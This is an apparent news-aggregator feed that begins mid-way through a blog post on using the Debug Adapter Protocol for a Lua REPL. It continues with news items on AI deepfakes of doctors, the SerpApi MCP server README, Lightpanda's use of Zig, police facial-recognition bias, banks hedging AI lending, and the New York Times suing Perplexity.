   * An empty string can be used if no value should be shown in the UI.
   */
  value: string;

  /**
   * The type of the variable's value. Typically shown in the UI when hovering
   * over the value.
   * This attribute should only be returned by a debug adapter if the
   * corresponding capability `supportsVariableType` is true.
   */
  type?: string;


  /**
   * If `variablesReference` is > 0, the variable is structured and its children
   * can be retrieved by passing `variablesReference` to the `variables` request
   * as long as execution remains suspended. See 'Lifetime of Object References'
   * in the Overview section for details.
   */
  variablesReference: number;

  // [...]
}

A Variable is pretty similar to the initial evaluate result, except that it has both name and value. It also has a variablesReference property of its own, which means variables can be arbitrarily deeply nested (and you can have cyclic references).

This already covers most of the functionality of a typical REPL backend. One more feature that’s nice to have is completion, and the Debug Adapter Protocol also has a completions command for that. Click on the link if you’re interested - I won’t go into detail about that here.

Another untypical feature for a REPL that the Debug Adapter Protocol provides is finding the location of a variable’s definition. That’s also implemented in nluarepl , although it only works for functions.

The Boilerplate

You might be wondering if there is anything in the Debug Adapter Protocol one must implement that’s useless baggage if all you want is a REPL frontend or backend.

Yes, there are a few things:

  • There’s the RPC mechanism, which is close to JSON-RPC, but not quite.
  • Breakpoint handling. You can send back a response that rejects them all. ( nluarepl implements log points, which are basically dynamic log statements you can create at runtime.)
  • Session initialization. Here you can send back the capabilities.
  • launch / attach pseudo handling.
  • Disconnect/terminate handling. Not much is needed here; you can use these to clean up any state.

The typical flow is that a client starts a debug session with an initialize command. The debug adapter replies with its capabilities, and a normal client follows up by sending breakpoints and then a launch command, which in a normal scenario would launch the application you want to debug.

To give you an impression of what this entails, here’s a snippet of the nluarepl code to implement the “dummy” actions:

function Client:initialize(request)
  ---@type dap.Capabilities
  local capabilities = {
    supportsLogPoints = true,
    supportsConditionalBreakpoints = true,
    supportsCompletionsRequest = true,
    completionTriggerCharacters = {"."},
  }
  self:send_response(request, capabilities)
  self:send_event("initialized", {})
end


function Client:disconnect(request)
  debug.sethook()
  self:send_event("terminated", {})
  self:send_response(request, {})
end


function Client:terminate(request)
  debug.sethook()
  self:send_event("terminated", {})
  self:send_response(request, {})
end

function Client:launch(request)
  self:send_response(request, {})
end

Motivation

Final question: Why would you do that?

Partly because of laziness. From a development perspective I didn’t want to have to implement another REPL UI. Going the DAP route let me focus on the evaluation parts. And from a user perspective, I also wanted to re-use UI elements from nvim-dap . I’m used to that interface and have keymaps set up. I didn’t want to have another slightly different interface with different keymaps or behavior.

SpaceX in Talks for Share Sale That Would Boost Valuation to $800B

Hacker News
www.wsj.com
2025-12-05 18:49:07
Comments...

AI deepfakes of real doctors spreading health misinformation on social media

Guardian
www.theguardian.com
2025-12-05 18:45:58
Hundreds of videos on TikTok and elsewhere impersonate experts to sell supplements with unproven effects TikTok and other social media platforms are hosting AI-generated deepfake videos of doctors whose words have been manipulated to help sell supplements and spread health misinformation. The factc...
Original Article

TikTok and other social media platforms are hosting AI-generated deepfake videos of doctors whose words have been manipulated to help sell supplements and spread health misinformation.

The factchecking organisation Full Fact has uncovered hundreds of such videos featuring impersonated versions of doctors and influencers directing viewers to Wellness Nest, a US-based supplements firm.

All the deepfakes involve real footage of a health expert taken from the internet. However, the pictures and audio have been reworked so that the speakers are encouraging women going through menopause to buy products such as probiotics and Himalayan shilajit from the company’s website.

The revelations have prompted calls for social media giants to be much more careful about hosting AI-generated content and quicker to remove content that distorts prominent people’s views.

“This is certainly a sinister and worrying new tactic,” said Leo Benedictus, the factchecker who undertook the investigation, which Full Fact published on Friday.

He added that the creators of deepfake health videos deploy AI so that “someone well-respected or with a big audience appears to be endorsing these supplements to treat a range of ailments”.

Prof David Taylor-Robinson, an expert in health inequalities at Liverpool University, is among those whose image has been manipulated. In August, he was shocked to find that TikTok was hosting 14 doctored videos purporting to show him recommending products with unproven benefits.

Though Taylor-Robinson is a specialist in children’s health, in one video the cloned version of him was talking about an alleged menopause side-effect called “thermometer leg”.

The fake Taylor-Robinson recommended that women in menopause should visit a website called Wellness Nest and buy what it called a natural probiotic featuring “10 science-backed plant extracts, including turmeric, black cohosh, Dim [diindolylmethane] and moringa, specifically chosen to tackle menopausal symptoms”.

Female colleagues “often report deeper sleep, fewer hot flushes and brighter mornings within weeks”, the deepfake doctor added.

The real Taylor-Robinson discovered that his likeness was being used only when a colleague alerted him. “It was really confusing to begin with – all quite surreal,” he said. “My kids thought it was hilarious.

Black cohosh supplement pills. Photograph: Julie Woodhouse/Alamy

“I didn’t feel desperately violated, but I did become more and more irritated at the idea of people selling products off the back of my work and the health misinformation involved.”

The footage of Taylor-Robinson used to make the deepfake videos came from a talk on vaccination he gave at a Public Health England (PHE) conference in 2017 and a parliamentary hearing on child poverty at which he gave evidence in May this year.

In one misleading video, he was depicted swearing and making misogynistic comments while discussing menopause.

TikTok took down the videos six weeks after Taylor-Robinson complained. “Initially, they said some of the videos violated their guidelines but some were fine. That was absurd – and weird – because I was in all of them and they were all deepfakes. It was a faff to get them taken down,” he said.

Full Fact found that TikTok was also carrying eight deepfakes featuring doctored statements by Duncan Selbie, the former chief executive of PHE. Like Taylor-Robinson, he was falsely shown talking about menopause, using video taken from the same 2017 event where Taylor-Robinson spoke.

One video, also about “thermometer leg”, was “an amazing imitation”, Selbie said. “It’s a complete fake from beginning to end. It wasn’t funny in the sense that people pay attention to these things.”

Full Fact also found similar deepfakes on X, Facebook and YouTube, all linked to Wellness Nest or a linked British outlet called Wellness Nest UK. It has posted apparent deepfakes of high-profile doctors such as Prof Tim Spector and another diet expert, the late Dr Michael Mosley.

Michael Mosley. Photograph: TT News Agency/Alamy

Wellness Nest told Full Fact that deepfake videos encouraging people to visit the firm’s website were “100% unaffiliated” with its business. It said it had “never used AI-generated content”, but “cannot control or monitor affiliates around the world”.

Helen Morgan, the Liberal Democrat health spokesperson, said: “From fake doctors to bots that encourage suicide, AI is being used to prey on innocent people and exploit the widening cracks in our health system.

“Liberal Democrats are calling for AI deepfakes posing as medical professionals to be stamped out, with clinically approved tools strongly promoted so we can fill the vacuum.

“If these were individuals fraudulently pretending to be doctors they would face criminal prosecution. Why is the digital equivalent being tolerated?

“Where someone seeks health advice from an AI bot they should be automatically referred to NHS support so they can get the diagnosis and treatment they actually need, with criminal liability for those profiting from medical disinformation.”

A TikTok spokesperson said: “We have removed this content [relating to Taylor-Robinson and Selbie] for breaking our rules against harmful misinformation and behaviours that seek to mislead our community, such as impersonation.

“Harmfully misleading AI-generated content is an industry-wide challenge, and we continue to invest in new ways to detect and remove content that violates our community guidelines.”

The Department of Health and Social Care was approached for comment.

Show HN: SerpApi MCP Server

Hacker News
github.com
2025-12-05 18:30:06
Comments...
Original Article

SerpApi MCP Server

A Model Context Protocol (MCP) server implementation that integrates with SerpApi for comprehensive search engine results and data extraction.

Python 3.13+ MIT License

Features

  • Multi-Engine Search : Google, Bing, Yahoo, DuckDuckGo, YouTube, eBay, and more
  • Real-time Weather Data : Location-based weather with forecasts via search queries
  • Stock Market Data : Company financials and market data through search integration
  • Dynamic Result Processing : Automatically detects and formats different result types
  • Flexible Response Modes : Structured JSON output with complete or compact modes

Quick Start

SerpApi MCP Server is available as a hosted service at mcp.serpapi.com. To connect to it, you need to provide an API key. You can find your API key on your SerpApi dashboard.

You can configure Claude Desktop to use the hosted server:

{
  "mcpServers": {
    "serpapi": {
      "url": "https://mcp.serpapi.com/YOUR_SERPAPI_API_KEY/mcp"
    }
  }
}

Self-Hosting

git clone https://github.com/serpapi/serpapi-mcp.git
cd serpapi-mcp
uv sync && uv run src/server.py

Configure Claude Desktop:

{
  "mcpServers": {
    "serpapi": {
      "url": "http://localhost:8000/YOUR_SERPAPI_API_KEY/mcp"
    }
  }
}

Get your API key: serpapi.com/manage-api-key

Authentication

Two methods are supported:

  • Path-based: /YOUR_API_KEY/mcp (recommended)
  • Header-based: Authorization: Bearer YOUR_API_KEY

Examples:

# Path-based
curl "https://mcp.serpapi.com/your_key/mcp" -d '...'

# Header-based  
curl "https://mcp.serpapi.com/mcp" -H "Authorization: Bearer your_key" -d '...'

Search Tool

The MCP server has one main Search Tool that supports all SerpApi engines and result types. You can find all available parameters in the SerpApi API reference.

The parameters you can provide are specific to each engine. Some sample parameters are listed below:

  • params.q (required): Search query
  • params.engine : Search engine (default: "google_light")
  • params.location : Geographic filter
  • mode : Response mode - "complete" (default) or "compact"
  • ...see other parameters on the SerpApi API reference

Examples:

{"name": "search", "arguments": {"params": {"q": "coffee shops", "location": "Austin, TX"}}}
{"name": "search", "arguments": {"params": {"q": "weather in London"}}}
{"name": "search", "arguments": {"params": {"q": "AAPL stock"}}}
{"name": "search", "arguments": {"params": {"q": "news"}, "mode": "compact"}}
{"name": "search", "arguments": {"params": {"q": "detailed search"}, "mode": "complete"}}

Supported Engines: Google, Bing, Yahoo, DuckDuckGo, YouTube, eBay, and more.

Result Types: Answer boxes, organic results, news, images, shopping - automatically detected and formatted.

Development

# Local development
uv sync && uv run src/server.py

# Docker
docker build -t serpapi-mcp . && docker run -p 8000:8000 serpapi-mcp

# Testing with MCP Inspector
npx @modelcontextprotocol/inspector
# Configure: URL mcp.serpapi.com/YOUR_KEY/mcp, Transport "Streamable HTTP transport"

Troubleshooting

  • "Missing API key" : Include key in URL path /{YOUR_KEY}/mcp or header Bearer YOUR_KEY
  • "Invalid key" : Verify at serpapi.com/dashboard
  • "Rate limit exceeded" : Wait or upgrade your SerpApi plan
  • "No results" : Try different query or engine

Contributing

  1. Fork the repository
  2. Create your feature branch: git checkout -b feature/amazing-feature
  3. Install dependencies: uv sync
  4. Make your changes
  5. Commit changes: git commit -m 'Add amazing feature'
  6. Push to branch: git push origin feature/amazing-feature
  7. Open a Pull Request

License

MIT License - see LICENSE file for details.

Why we built Lightpanda in Zig

Hacker News
lightpanda.io
2025-12-05 18:29:50
Comments...
Original Article

Because We're Not Smart Enough for C++ or Rust

Francis Bouvier

Cofounder & CEO

Why We Built Lightpanda in Zig

TL;DR

To be honest, when I began working on Lightpanda, I chose Zig because I’m not smart enough to build a big project in C++ or Rust.

I like simple languages. I like Zig for the same reasons I like Go, C, and the KISS principle. Not just because I believe in this philosophy, but because I’m not capable of handling complicated abstractions at scale.

Before Lightpanda, I was doing a lot of Go. But building a web browser from scratch requires a low-level systems programming language to ensure great performance, so Go wasn’t an option. And for a project like this, I wanted more safety and modern tooling than C.

Why We Built Lightpanda in Zig

Our requirements were performance, simplicity, and modern tooling. Zig seemed like the perfect balance: simpler than C++ and Rust, top-tier performance, and better tooling and safety than C.

As we built the first iterations of the browser and dug deeper into the language, we came to appreciate features where Zig particularly shines: comptime metaprogramming, explicit memory allocators, and best-in-class C interoperability. Not to mention the ongoing work on compilation times.

Of course it’s a big bet. Zig is a relatively new language with a small ecosystem. It’s pre-1.0 with regular breaking changes. But we’re very bullish on this language, and we’re not the only ones: Ghostty, Bun, TigerBeetle, and ZML are all building with Zig. And with Anthropic’s recent acquisition of Bun, big tech is taking notice.

Here’s what we’ve learned.

What Lightpanda Needs from a Language

Before diving into specifics, let’s talk about what building a browser for web automation requires.

First, we needed a JavaScript engine. Without one, a browser only sees static HTML: no client-side rendering and no dynamic content. We chose V8, Chrome’s JavaScript engine, because it’s state of the art, widely used (Node.js, Deno), and relatively easy to embed.

V8 is written in C++, and doesn’t have a C API, which means any language integrating with it must handle C++ boundaries. Zig doesn’t interoperate directly with C++, but it has first-class C interop, and C remains the lingua franca of systems programming. We use C headers generated primarily from rusty_v8, part of the Deno project, to bridge between V8’s C++ API and our Zig code.

Beyond integration, performance and memory control were essential. When you’re crawling thousands of pages or running automation at scale, every millisecond counts. We also needed precise control over short-lived allocations like DOM trees, JavaScript objects, and parsing buffers. Zig’s explicit allocator model fits that need perfectly.

Why Not C++?

C++ was the obvious option: it powers virtually every major browser engine. But here’s what gave us pause.

  • Four decades of features : C++ has accumulated enormous complexity over the years. There are multiple ways to do almost everything: template metaprogramming, multiple inheritance patterns, various initialization syntaxes. We wanted a language with one clear way to do things.
  • Memory management : Control comes with constant vigilance. Use-after-free bugs, memory leaks, and dangling pointers are real risks. Smart pointers help, but they add complexity and runtime overhead. Zig’s approach of passing allocators explicitly makes memory management clearer and enables patterns like arenas more naturally.
  • Build systems : Anyone who’s fought with CMake or dealt with header file dependencies knows this pain. For a small team trying to move quickly, we didn’t want to waste time debugging build configuration issues.

We’re not saying C++ is bad. It powers incredible software. But for a small team starting from scratch, we wanted something simpler.

Why not Rust?

Many people ask this next. It’s a fair challenge. Rust is a more mature language than Zig, offers memory safety guarantees, has excellent tooling, and a growing ecosystem.

Rust would have been a viable choice. But for Lightpanda’s specific needs (and honestly, for our team’s experience level) it introduced friction we didn’t want.

The Unsafe Rust Problem

When you need to do things the borrow checker doesn’t like, you end up writing unsafe Rust, which is surprisingly hard. Zack from Bun explores this in depth in his article When Zig is safer and faster than Rust.

Browser engines and garbage-collected runtimes are classic examples of code that fights the borrow checker. You’re constantly juggling different memory regions: per-page arenas, shared caches, temporary buffers, objects with complex interdependencies. These patterns don’t map cleanly to Rust’s ownership model. You end up either paying performance costs (using indices instead of pointers, unnecessary clones) or diving into unsafe code where raw pointer ergonomics are poor and Miri becomes your constant companion.

Zig takes a different approach. Rather than trying to enforce safety through the type system and then providing an escape hatch, Zig is designed for scenarios where you’re doing memory-unsafe things. It gives you tools to make that experience better: non-null pointers by default, the GeneralPurposeAllocator that catches use-after-free bugs in debug mode, and pointer types with good ergonomics.

Why Zig Works for Lightpanda

Zig sits in an interesting space. It’s a simple language that’s easy to learn, where everything is explicit: no hidden control flow, no hidden allocations.

Explicit Memory Management with Allocators

Zig makes you choose how memory is managed through allocators. Every allocation requires you to specify which allocator to use. This might sound tedious at first, but it gives you precise control.

Here’s what this looks like in practice, using an arena allocator:
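A minimal sketch of the pattern (illustrative, not Lightpanda’s actual code):

const std = @import("std");

pub fn handlePage(gpa: std.mem.Allocator) !void {
    // One arena per page load: everything allocated during the page's
    // lifecycle comes out of it.
    var arena = std.heap.ArenaAllocator.init(gpa);
    // When the page is done, one call frees the entire chunk.
    defer arena.deinit();
    const alloc = arena.allocator();

    // DOM nodes, parse buffers, JS scratch space, etc. (illustrative)
    const buf = try alloc.alloc(u8, 64 * 1024);
    _ = buf;
    // No individual frees, no reference counting: arena.deinit() handles it.
}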

This pattern matches browser workloads perfectly. Each page load gets its own arena, and when the page is done, we throw away the entire memory chunk: no tracking of individual allocations, no reference-counting overhead, no garbage-collection pauses. (Though we’re learning that single pages can grow large in memory, so we’re also exploring mid-lifecycle cleanup strategies.) And you can chain arenas to create short-lived objects inside a page lifecycle.

Compile-Time Metaprogramming

Zig’s comptime feature lets you write code that runs during compilation. We use this extensively to reduce boilerplate when bridging Zig and JavaScript.

When integrating V8, you need to expose native types to JavaScript. In most languages, this requires glue code for each type, and generating that glue usually means macros (Rust, C, C++). Macros are effectively a separate language, which brings a lot of downsides. Zig’s comptime lets us automate this in plain Zig:
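Here is a minimal sketch of the idea (the real registerType is more involved; the Point type and its move method are illustrative):

const std = @import("std");

const Point = struct {
    x: f64,
    y: f64,

    pub fn move(self: *Point, dx: f64, dy: f64) void {
        self.x += dx;
        self.y += dy;
    }
};

// Walk a type's fields and public declarations at compile time; a real
// implementation would emit V8 function and property templates here.
fn registerType(comptime T: type) void {
    inline for (std.meta.fields(T)) |field| {
        // Generate a JS property getter/setter for field.name (e.g. x, y).
        _ = field;
    }
    inline for (std.meta.declarations(T)) |decl| {
        // Generate a JS wrapper function for decl.name (e.g. move).
        _ = decl;
    }
}

comptime {
    registerType(Point);
}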

The registerType function uses comptime reflection to:

  • Find all public methods on Point
  • Generate JavaScript wrapper functions
  • Create property getters/setters for x and y
  • Handle type conversions automatically

This eliminates manual binding code and makes adding new types simple by using the same language at compile time and runtime.

C Interop That Just Works

Zig’s C interop is a first-class feature: you can directly import C header files and call C functions without wrapper libraries.

For example, we use cURL as our HTTP library. We can just import libcurl C headers in Zig and use the C functions directly:
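A minimal sketch (assuming libcurl’s headers are on the include path):

const c = @cImport({
    @cInclude("curl/curl.h");
});

pub fn fetch(url: [:0]const u8) !void {
    // Call libcurl's C API directly; no wrapper library needed.
    const handle = c.curl_easy_init() orelse return error.CurlInitFailed;
    defer c.curl_easy_cleanup(handle);

    _ = c.curl_easy_setopt(handle, c.CURLOPT_URL, url.ptr);
    if (c.curl_easy_perform(handle) != c.CURLE_OK) return error.RequestFailed;
}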

It feels as simple as using C, except you are programming in Zig.

And with the build system it’s also very simple to add C sources so everything builds together (your Zig code and the C libraries):
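A build.zig along these lines (a sketch against a recent Zig build API; the exact calls shift between releases, and the C file name is hypothetical):

const std = @import("std");

pub fn build(b: *std.Build) void {
    const exe = b.addExecutable(.{
        .name = "browser",
        .root_source_file = b.path("src/main.zig"),
        .target = b.standardTargetOptions(.{}),
        .optimize = b.standardOptimizeOption(.{}),
    });

    // Compile vendored C sources right alongside the Zig code.
    exe.addCSourceFiles(.{
        .files = &.{"vendor/example.c"}, // hypothetical C source
        .flags = &.{"-O2"},
    });
    exe.linkSystemLibrary("curl");
    exe.linkLibC();

    b.installArtifact(exe);
}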

This ease of importing C offsets the fact that the Zig ecosystem is still small: all existing C libraries are available to you.

The Build System Advantage

Zig includes its own build system written in Zig itself. This might sound unremarkable, but compared to CMake, it’s refreshingly straightforward. Adding dependencies, configuring compilation flags, and managing cross-compilation all happen in one place with clear semantics. Runtime, comptime, build system: everything is in Zig, which makes things easier.

Cross-compilation in particular is usually a difficult topic, but it’s very easy with Zig. Some companies, like Uber, use Zig mainly as a build system and toolchain.

Compile times matter

Zig compiles fast. Our full rebuild takes under a minute. That’s not as fast as Go or an interpreted language, but fast enough to keep the development feedback loop responsive. In that regard, Zig is considerably faster than Rust or C++.

This is a strong focus of the Zig team. They are also a small team, and they need fast compilation for the development of the language itself, as Zig is written in Zig (self-hosted). For that purpose, they are developing native compiler backends (i.e. not using LLVM), an ambitious effort that is already paying off: the native backend is the default for x86 in debug mode, with a significant improvement in build times (3.5x faster for the Zig project itself). And incremental compilation is on its way.

What We’ve Learned

After months of building Lightpanda in Zig, here’s what stands out.

  • The learning curve is manageable. Zig’s simplicity means you can understand the entire language in a few weeks. Compared to Rust or C++, this makes a real difference.
  • The allocator model pays off. Being able to create arena allocators per page load, per request, or per task gives us fine-grained memory control without tracking individual allocations.
  • The community is small but helpful. Zig is still growing. The Discord community and ziggit.dev are active, and the language is simple enough that you can often figure things out by reading the standard library source.

Conclusion

Lightpanda wouldn’t exist without the work of the Zig Foundation and the community behind it. Zig has made it possible to build something as complex as a browser with a small team and a clear mental model, without sacrificing performance.

FAQ

Is Zig stable enough for production use?

Zig is still pre-1.0, which means breaking changes can happen between versions. That said, we’ve found it stable enough for our production use, especially since the ecosystem has largely standardized on tracking the latest tagged releases rather than main. The language itself is well-designed, and most changes between versions are improvements that are worth adapting to. Just be prepared to update code when upgrading Zig versions.

What’s the hardest part about learning Zig?

The allocator model takes adjustment if you’re coming from garbage-collected languages. You need to think about where memory comes from and when it gets freed. But compared to Rust’s borrow checker or C++’s memory management, it’s relatively straightforward once you understand the patterns.

Can Zig really replace C++ for browser development?

For building a focused browser like Lightpanda, yes. For replacing Chromium or Firefox, that’s unlikely: those projects have millions of lines of C++ and decades of optimization. We’re more likely to see Rust complementing C++ in those projects over time, as with Firefox leveraging Servo. But for new projects where you control the codebase, Zig is absolutely viable.

Where can I learn more about Zig?

Start with the official Zig documentation. The Zig Learn site provides practical tutorials. And join the community on Discord or ziggit.dev, where developers actively help newcomers. The language is simple enough that reading standard library source code is also a viable learning approach.


Francis Bouvier

Cofounder & CEO

Francis previously cofounded BlueBoard, an ecommerce analytics platform acquired by ChannelAdvisor in 2020. While running large automation systems he saw how limited existing browsers were for this kind of work. Lightpanda grew from his wish to give developers a faster and more reliable way to automate the web.

‘Urgent clarity’ sought over racial bias in UK police facial recognition technology

Guardian
www.theguardian.com
2025-12-05 18:28:01
Testing showing racial bias against black and Asian people prompts watchdog to ask Home Office for explanation The UK’s data protection watchdog has asked the Home Office for “urgent clarity” over racial bias in police facial recognition technology before considering its next steps. The Home Office ...
Original Article

The UK’s data protection watchdog has asked the Home Office for “urgent clarity” over racial bias in police facial recognition technology before considering its next steps.

The Home Office has admitted that the technology was “more likely to incorrectly include some demographic groups in its search results”, after the National Physical Laboratory (NPL) tested its application within the police national database.

The report revealed that the technology, which is intended to be used to catch serious offenders, is more likely to incorrectly match black and Asian people than their white counterparts.

In a statement responding to the report, Emily Keaney, the deputy commissioner for the Information Commissioner’s Office, said the ICO had asked the Home Office “for urgent clarity on this matter” in order for the watchdog to “assess the situation and consider our next steps”.

The next steps could include enforcement action, including issuing a legally binding order to stop using the technology or fines, as well as working with the Home Office and police to make improvements.

Keaney said: “Last week we were made aware of historical bias in the algorithm used by forces across the UK for retrospective facial recognition within the police national database.

“We acknowledge that measures are being taken to address this bias. However, it’s disappointing that we had not previously been told about this, despite regular engagement with the Home Office and police bodies as part of our wider work to hold government and the public sector to account on how data is being used in their services.

“While we appreciate the valuable role technology can play, public confidence in its use is paramount, and any perception of bias and discrimination can exacerbate mistrust. The ICO is here to support and assist the public sector to get this right.”

Police and crime commissioners said publication of the NPL’s finding “sheds light on a concerning inbuilt bias” and urged caution over plans for a national expansion, which could see cameras placed at shopping centres, stadiums and transport hubs without adequate safeguards in place.

The findings were released on Thursday, hours after Sarah Jones, the policing minister, had described the technology as the “biggest breakthrough since DNA matching”.

Facial recognition technology scans people’s faces and cross-references the images against watchlists of known or wanted criminals. It can be used while examining live footage of people passing cameras, comparing their faces with those on wanted lists, or to enable officers to target individuals as they walk by mounted cameras.

Police officers can also retrospectively run images of suspects through police, passport or immigration databases to identify them and check their backgrounds.

Analysts who examined the police national database’s retrospective facial recognition technology tool at a lower setting found that “the false positive identification rate (FPIR) for white subjects (0.04%) is lower than that for Asian subjects (4.0%) and black subjects (5.5%)”.

The testing found that the number of false positives for black women was particularly high. “The FPIR for black male subjects (0.4%) is lower than that for black female subjects (9.9%),” the report said.

Responding to the report, a Home Office spokesperson said the department took the findings “seriously”, and had already taken action, including procuring and testing a new algorithm “which has no statistically significant bias”.

“Given the importance of this issue, we have also asked the police inspectorate, alongside the forensic science regulator, to review law enforcement’s use of facial recognition. They will assess the effectiveness of the mitigations, which the National Police Chiefs’ Council supports,” the spokesperson said.


Wall Street races to protect itself from AI bubble

Hacker News
rollingout.com
2025-12-05 18:21:43
Comments...
Original Article

Banks are lending unprecedented sums to technology giants building artificial intelligence infrastructure while quietly using derivatives to shield themselves from potential losses.

Wall Street finds itself in an unusual position as it prepares to lend staggering amounts to artificial intelligence companies. Even as banks facilitate what may become the largest borrowing binge in technology history, they are simultaneously deploying an arsenal of financial tools to protect themselves from the very bubble their money might be inflating.

The anxiety permeating credit markets tells the story. The cost of insuring Oracle debt against default through derivatives has climbed to levels not seen since the Global Financial Crisis. Morgan Stanley has explored using specialized insurance mechanisms to reduce exposure to its tech borrowers. Across trading desks, lenders are quietly hedging positions even as they publicly champion the transformative potential of artificial intelligence.


Unprecedented Wall Street lending to technology giants

Mega offerings from Oracle, Meta Platforms and Alphabet have pushed global bond issuance past $6.46 trillion in 2025. These hyperscalers, alongside electric utilities and related firms, are expected to spend at least $5 trillion racing to build data centers and infrastructure for technology promising to revolutionize the global economy.

The scale is so immense that issuers must tap virtually every major debt market, according to JPMorgan Chase analysis. These technology investments could take years to generate returns, assuming they deliver profits at all. The frenzied pace has left some lenders dangerously overexposed, prompting them to use credit derivatives, sophisticated bonds and newer financial products to shift underwriting risk to other investors.


Technology that may not translate to profits

Steven Grey, chief investment officer at Grey Value Management, emphasized that impressive technology does not automatically guarantee profitability. Those risks became tangible last week when a major outage halted trading at CME Group and served as a stark reminder that data center customers can abandon providers after repeated breakdowns. Following that incident, Goldman Sachs paused a planned $1.3 billion mortgage bond sale for CyrusOne, a data center operator.

Banks have turned aggressively to credit derivatives markets to reduce exposure. Trading of Oracle credit default swaps exploded to roughly $8 billion over the nine weeks ended November 28, according to analysis of trade repository data by Barclays credit strategist Jigar Patel. That compares to just $350 million during the same period last year.

Banks are providing the bulk of massive construction loans for data centers where Oracle serves as the intended tenant, likely driving much of this hedging activity, according to recent Morgan Stanley research. These include a $38 billion loan package and an $18 billion loan to build multiple new data center facilities in Texas, Wisconsin and New Mexico.

Hedging costs climb across the sector

Prices for protection have risen sharply across the board. As of Thursday, a five-year credit default swap protecting $10 million of Microsoft debt from default would cost approximately $34,000 annually, or 34 basis points (0.34% of the $10 million notional). In mid-October, that same protection cost closer to $20,000 yearly.

Andrew Weinberg, a portfolio manager at Saba Capital Management, noted that the spread on Microsoft default swaps appears remarkably wide for a company rated AAA. The hedge fund has been selling protection on the tech giant. By comparison, protection on Johnson & Johnson, the only other American company with a AAA rating, cost about 19 basis points annually on Thursday.

Weinberg suggested that selling protection on Microsoft at levels more than 50% wider than fellow AAA rated Johnson & Johnson represents a remarkable opportunity. Microsoft, which has not issued debt this year, declined to comment. Similar opportunities exist with Oracle, Meta and Alphabet, according to Weinberg. Despite their large debt raises, their credit default swaps trade at high spreads relative to actual default risk, making selling protection sensible. Even if these companies face downgrades, the positions should perform well because they already incorporate substantial potential bad news.

Sophisticated tools help Wall Street shift risk

Morgan Stanley, a key player in financing the artificial intelligence race, has considered offloading some data center exposure through a transaction known as a significant risk transfer. These deals can provide banks with default protection for between 5% and 15% of a designated loan portfolio. Such transfers often involve selling bonds called credit linked notes, which can have credit derivatives tied to companies or loan portfolios embedded within them. If borrowers default, the bank receives a payout covering its loss.

Morgan Stanley held preliminary talks with potential investors about a significant risk transfer tied to a portfolio of loans to businesses involved in AI infrastructure, Bloomberg reported Wednesday. Mark Clegg, a senior fixed income trader at Allspring Global Investments, observed that banks remain fully aware of recent market concerns about possible overinvestment and overvaluation. He suggested it should surprise no one that they might explore hedging or risk transfer mechanisms.

Private capital firms including Ares Management have been positioning themselves to absorb some bank exposure through significant risk transfers tied to data centers. The massive scale of recent debt offerings adds urgency to these efforts. Not long ago, a $10 billion deal in the American high-grade market qualified as big. Now, with multi-trillion-dollar market capitalization companies and funding needs in the hundreds of billions, Teddy Hodgson, global co-head of investment-grade debt capital markets at Morgan Stanley, suggested that $10 billion represents merely a drop in the bucket. He noted that Morgan Stanley raised $30 billion for Meta in a drive-by financing executed in a single day, an event that is not historically commonplace. Investors will need to adjust to bigger deals from hyperscalers given how much these companies have grown and how expensive capturing this opportunity will prove.

New York Times sues AI startup for ‘illegal’ copying of millions of articles

Guardian
www.theguardian.com
2025-12-05 18:19:12
Perplexity AI also faces lawsuit from Murdoch-owned Dow Jones and New York Post for its use of copyrighted content The New York Times sued an embattled artificial intelligence startup on Friday, accusing the firm of illegally copying millions of articles. The newspaper alleged Perplexity AI had dist...
Original Article

The New York Times sued an embattled artificial intelligence startup on Friday, accusing the firm of illegally copying millions of articles. The newspaper alleged Perplexity AI had distributed and displayed journalists’ work without permission en masse.

The Times said that Perplexity AI was also violating its trademarks under the Lanham Act, claiming the startup’s generative AI products create fabricated content, or “hallucinations”, and falsely attribute them to the newspaper by displaying them alongside its registered trademarks.

The newspaper said that Perplexity’s business model relies on scraping and copying content, including paywalled material, to power its generative AI products. Other publishers have made similar allegations.

The lawsuit is the latest salvo in a bitter, ongoing battle between publishers and tech companies over the use of copyrighted content without authorization to build and operate their AI systems.

Perplexity in particular has become a target of multiple legal disputes and faces similar accusations from a number of publishers as it tries to aggressively build market share in a hyper-competitive market for generative AI tools. Cloudflare, one of the world’s most prominent digital infrastructure companies, accused Perplexity earlier this year of hiding its web-crawling activities and scraping websites without permission – a serious accusation with potential copyright implications. Perplexity denied the allegations.

Perplexity has raised about $1.5bn in the past three years through multiple funding rounds, most recently closing a $200m round in September that valued the company at $20bn. It has attracted a variety of big-name investors, including Nvidia and Jeff Bezos, as money has flooded the AI industry.

San Francisco-based Perplexity AI also faced a lawsuit from the Rupert Murdoch-owned Dow Jones and the New York Post.

Multiple news outlets, including Forbes and Wired, have accused Perplexity of plagiarizing their content, in one case allegedly copying a Wired article about Perplexity’s own plagiarism issues. The Chicago Tribune, Merriam-Webster Dictionary and Encyclopedia Britannica have all additionally filed lawsuits against Perplexity in recent months, accusing the company of copyright infringement.

In October, social media company Reddit also sued Perplexity in New York federal court, accusing it and three other companies of unlawfully scraping its data to train Perplexity’s AI-based search engine.

Perplexity faces legal challenges from its fellow tech companies as well. Amazon last month filed a lawsuit against Perplexity over the search engine’s AI agent shopping feature. The suit alleged that Perplexity was covertly accessing Amazon users’ accounts and masking its AI browsing activities, which Perplexity has denied while accusing Amazon of bullying and attempting to stifle competitors.

Perplexity did not immediately respond to a Reuters request for comment.

WikiFlix: Full Movies Hosted on Wikimedia Commons

Hacker News
commons.wikimedia.org
2025-12-05 18:08:19
Comments...
Original Article

From Wikimedia Commons, the free media repository

Map

Filming locations of public domain and freely licensed films.

Films that have won awards

Here are some award-winning movies, by award category:

  • Academy Award for Best Actor
  • Academy Award for Best Actress
  • Academy Award for Best Animated Short Film
  • Academy Award for Best Art Direction, Black and White
  • Academy Award for Best Cinematography
  • Academy Award for Best Director
  • Academy Award for Best Documentary (Short Subject)
  • Academy Award for Best Documentary Feature Film
  • Academy Award for Best Picture
  • Academy Award for Best Story
  • Academy Honorary Award
  • Annecy Cristal for a Feature Film
  • Filmfare Award for Best Film
  • Filmfare Award for Best Music Director
  • Hundred Flowers Award for Best Animation
  • National Board of Review: Top Ten Films
  • National Film Award for Best Bengali Feature Film
  • National Film Award for Best Feature Film
  • Silver Bear for Best Director
  • Stalin Prize for Literature and Art

End of auto-generated list.

Behind the Blog: Hearing AI Voices and 'Undervolting'

403 Media
www.404media.co
2025-12-05 17:53:23
This week, we discuss PC woes, voice deepfakes, and mutual aid....
Original Article

This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss PC woes, voice deepfakes, and mutual aid.

